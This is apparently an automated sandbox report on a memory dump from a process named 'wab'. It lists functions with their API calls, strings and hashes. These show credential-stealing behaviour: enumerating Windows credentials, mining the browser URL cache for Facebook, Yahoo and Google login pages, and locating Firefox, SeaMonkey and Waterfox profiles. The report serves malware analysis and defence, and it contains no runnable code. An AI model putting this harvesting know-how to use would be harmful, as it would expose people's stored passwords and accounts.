                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                    APIs
                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                    • GetLastError.KERNEL32 ref: 0041847E
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CreateFile$??3@ErrorLast
                                    • String ID: |A
                                    • API String ID: 1407640353-1717621600
                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                    • String ID: r!A
                                    • API String ID: 2791114272-628097481
                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                    • _wcslwr.MSVCRT ref: 0040C817
                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                    • wcslen.MSVCRT ref: 0040C82C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                    • API String ID: 62308376-4196376884
                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                    APIs
                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                    • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                    • wcslen.MSVCRT ref: 0040BE06
                                    • _wcsncoll.MSVCRT ref: 0040BE38
                                    • memset.MSVCRT ref: 0040BE91
                                    • memcpy.MSVCRT ref: 0040BEB2
                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                    • wcschr.MSVCRT ref: 0040BF24
                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                    • String ID:
                                    • API String ID: 3191383707-0
                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                    APIs
                                    • memset.MSVCRT ref: 00403CBF
                                    • memset.MSVCRT ref: 00403CD4
                                    • memset.MSVCRT ref: 00403CE9
                                    • memset.MSVCRT ref: 00403CFE
                                    • memset.MSVCRT ref: 00403D13
                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                    • memset.MSVCRT ref: 00403DDA
                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                    • String ID: Waterfox$Waterfox\Profiles
                                    • API String ID: 3527940856-11920434
                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                    APIs
                                    • memset.MSVCRT ref: 00403E50
                                    • memset.MSVCRT ref: 00403E65
                                    • memset.MSVCRT ref: 00403E7A
                                    • memset.MSVCRT ref: 00403E8F
                                    • memset.MSVCRT ref: 00403EA4
                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                    • memset.MSVCRT ref: 00403F6B
                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                    • API String ID: 3527940856-2068335096
                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                    APIs
                                    • memset.MSVCRT ref: 00403FE1
                                    • memset.MSVCRT ref: 00403FF6
                                    • memset.MSVCRT ref: 0040400B
                                    • memset.MSVCRT ref: 00404020
                                    • memset.MSVCRT ref: 00404035
                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                    • memset.MSVCRT ref: 004040FC
                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                    • API String ID: 3527940856-3369679110
                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                    • API String ID: 3510742995-2641926074
                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                    APIs
                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                    • memset.MSVCRT ref: 004033B7
                                    • memcpy.MSVCRT ref: 004033D0
                                    • wcscmp.MSVCRT ref: 004033FC
                                    • _wcsicmp.MSVCRT ref: 00403439
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                    • String ID: $0.@
                                    • API String ID: 3030842498-1896041820
                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                    • String ID:
                                    • API String ID: 2941347001-0
                                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                    APIs
                                    • memset.MSVCRT ref: 00403C09
                                    • memset.MSVCRT ref: 00403C1E
                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                    • wcscat.MSVCRT ref: 00403C47
                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                    • wcscat.MSVCRT ref: 00403C70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memsetwcscat$Closewcscpywcslen
                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                    • API String ID: 3249829328-1174173950
                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                    APIs
                                    • memset.MSVCRT ref: 0040A824
                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                    • wcscpy.MSVCRT ref: 0040A854
                                    • wcscat.MSVCRT ref: 0040A86A
                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                    • String ID:
                                    • API String ID: 669240632-0
                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                    APIs
                                    • wcschr.MSVCRT ref: 00414458
                                    • _snwprintf.MSVCRT ref: 0041447D
                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                    • String ID: "%s"
                                    • API String ID: 1343145685-3297466227
                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                    APIs
                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcProcessTimes
                                    • String ID: GetProcessTimes$kernel32.dll
                                    • API String ID: 1714573020-3385500049
                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                    APIs
                                    • memset.MSVCRT ref: 004087D6
                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                    • memset.MSVCRT ref: 00408828
                                    • memset.MSVCRT ref: 00408840
                                    • memset.MSVCRT ref: 00408858
                                    • memset.MSVCRT ref: 00408870
                                    • memset.MSVCRT ref: 00408888
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                    • String ID:
                                    • API String ID: 2911713577-0
                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcmp
                                    • String ID: @ $SQLite format 3
                                    • API String ID: 1475443563-3708268960
                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                    APIs
                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                    • memset.MSVCRT ref: 00414C87
                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                    • wcscpy.MSVCRT ref: 00414CFC
                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressCloseProcVersionmemsetwcscpy
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                    • API String ID: 2705122986-2036018995
                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmpqsort
                                    • String ID: /nosort$/sort
                                    • API String ID: 1579243037-1578091866
                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
